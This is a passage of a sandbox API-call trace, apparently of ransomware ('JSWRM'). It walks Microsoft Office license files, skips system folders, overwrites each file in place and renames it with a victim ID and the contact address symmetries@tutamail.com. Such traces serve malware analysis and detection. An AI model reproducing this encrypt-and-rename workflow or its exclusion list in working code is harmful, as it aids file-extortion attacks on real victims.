(HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.920] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19934) returned 1 [0106.920] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0106.920] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.922] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.922] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.923] CloseHandle (hObject=0x45c) returned 1 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0106.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0106.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.923] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0106.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0106.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.924] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8c9aa9a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8c9aa9a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8da5b15, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Trial-pl.xrm-ms", cAlternateFileName="PE83B0~1.XRM")) returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.933] lstrcmpiW (lpString1="PersonalR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0106.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0106.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.935] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0106.935] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0106.935] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0106.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.938] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0106.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.938] CloseHandle (hObject=0x45c) returned 1 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0106.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0106.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.940] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe83cff6e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe83cff6e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe84b4db3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x527b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Trial-ppd.xrm-ms", cAlternateFileName="PE8E62~1.XRM")) returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.940] lstrcmpiW (lpString1="PersonalR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2413a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.941] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21115) returned 1 [0106.941] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5270) returned 0x24c1d0 [0106.941] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5270, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5270, lpOverlapped=0x0) returned 1 [0106.944] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.944] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5270, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5270, lpOverlapped=0x0) returned 1 [0106.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.944] CloseHandle (hObject=0x45c) returned 1 [0106.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0106.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0106.946] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe835d8b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe835d8b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe841c43e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Trial-ul-oob.xrm-ms", cAlternateFileName="PEB496~1.XRM")) returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.946] lstrcmpiW (lpString1="PersonalR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 